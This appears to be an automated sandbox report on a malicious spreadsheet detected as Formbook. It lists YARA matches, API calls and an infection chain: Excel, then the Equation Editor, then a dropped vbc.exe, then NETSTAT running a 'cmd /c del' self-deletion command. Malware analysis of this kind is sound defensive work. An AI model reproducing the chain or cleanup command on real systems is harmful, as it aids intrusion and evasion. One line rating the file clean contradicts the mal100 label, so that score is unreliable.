Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004047D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004061D4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73055990
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7305DFF2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73066A2B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73066A3A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73059E5E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7305F27E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_730606C9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7305EAD6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7305E564
Source: C:\Users\Public\vbc.exe	Code function: 4_2_730559D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C0F7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C9AF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BC19
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C5C5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BEF9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CFD6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CFD9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007DD06D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0077905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00763040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00801238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AA37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00767353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008063BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00762305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007863DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E443E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00795485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00771489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007A6540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0077C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E05E3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007AA634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00802622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00764680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007957C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007DF8C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0080098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E5955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E394B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007769FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007629B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00813A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0080CBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00787B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007EDBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007E6BCB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076CD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00790D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FFDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0077EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00792E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078DF7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00770F3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007D2FDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FCFB1
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C0F7
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C5C5
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041C9AF
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00408C7C
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041BC19
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00408C80
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041BEF9
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041CFD6
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041CFD9
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023A1238
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022FE2E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02302305
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0234A37B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02307353
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023A63BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022FF3CF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023263DB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0232D005
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0231905A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02303040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022FE0C6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0234A634
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023A2622
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02304680
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0230E6C1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0230C7BC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0238579A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023357C3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0238443E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0233D47D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02335485
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02311489
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0230351F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02346540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0231C5F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023B3A83
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02327B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023ACBA4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0238DBDA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022FFBD7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0232286D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0230C85C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0239F8EE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02385955
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0238394B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023029B2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023A098E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023169FE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02332E2F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0231EE4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02310F3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0232DF7C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0239CFB1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02372FDC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02330D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0230CD5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0239FDDD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009C9AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00088C7C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00088C80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00082D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00082D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00082FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009CFD9

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02343F92 appears 132 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0234373B appears 244 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 022FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0236F970 appears 84 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 022FDF5C appears 119 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0041A390 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007A3F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007CF970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0075DF5C appears 123 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0075E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007A373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0041A4C0 appears 38 times

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004185E0 NtCreateFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418690 NtReadFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418710 NtClose,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041868A NtReadFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041870A NtClose,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004187BB NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007500C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007507AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750060 NtQuerySection,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007510D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00751148 NtOpenThread,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007501D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F8CC NtWaitForSingleObject,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00751930 NtSetContextThread,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F938 NtWriteFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FA50 NtEnumerateValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FA20 NtQueryInformationFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FAB8 NtQueryValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FB50 NtCreateKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FBE8 NtQueryVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750C40 NtGetContextThread,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC48 NtSetInformationFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC30 NtOpenProcess,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FD5C NtEnumerateKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00751D80 NtSuspendThread,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FE24 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FF34 NtQueueApcThread,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FFFC NtCreateProcessEx,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004185E0 NtCreateFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00418690 NtReadFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00418710 NtClose,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041868A NtReadFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041870A NtClose,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004187BB NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F0060 NtQuerySection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F0078 NtResumeThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F0048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F10D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F1148 NtOpenThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F01D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EF8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EF938 NtWriteFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F1930 NtSetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F0C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022EFD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022F1D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_000985E0 NtCreateFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00098690 NtReadFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00098710 NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_000987C0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009868A NtReadFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009870A NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_000987BB NtAllocateVirtualMemory,

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Memory allocated: 76E90000 page execute and read and write

Source: PO5594.xlsx	Virustotal: Detection: 32%
Source: PO5594.xlsx	ReversingLabs: Detection: 29%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PO5594.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDA57.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/20@4/5

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: PO5594.xlsx

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

